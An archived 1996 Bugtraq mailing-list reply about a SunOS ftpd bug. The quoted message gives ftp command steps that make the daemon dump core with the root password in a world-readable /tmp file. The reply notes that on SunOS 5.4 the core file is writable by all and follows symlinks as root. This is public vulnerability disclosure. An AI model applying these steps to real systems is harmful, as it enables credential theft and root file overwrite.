[3479] in bugtraq
Re: ftpd bug? Was: bin/1805: Bug in ftpd
daemon@ATHENA.MIT.EDU (Grant Kaufmann)
Wed Oct 16 17:09:41 1996
Date: Wed, 16 Oct 1996 11:30:01 +0200
Reply-To: Grant Kaufmann <gkaufman@cs.uct.ac.za>
From: Grant Kaufmann <gkaufman@cs.uct.ac.za>
X-To: bos@suburbia.net
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To: <199610152314.AA21264@sap-ag.de> from "Martin Rex" at Oct 15,
96 06:14:08 pm
> Killing from the command line doesn't seem to work, but:
> SunOS 5.5:
>
> logon via ftp with your regular user/password,
> ftp> cd /tmp
> ftp> user root wrongpasswd
> ftp> quote pasv
>
> voila, root password in world readable core dump under /tmp
Nope, its even better than that. Under 5.4, the core file
is rw-rw-rw and it follows symlinks as root.
--
Grant
--
http://www.cs.uct.ac.za/~gkaufman/pgp.html
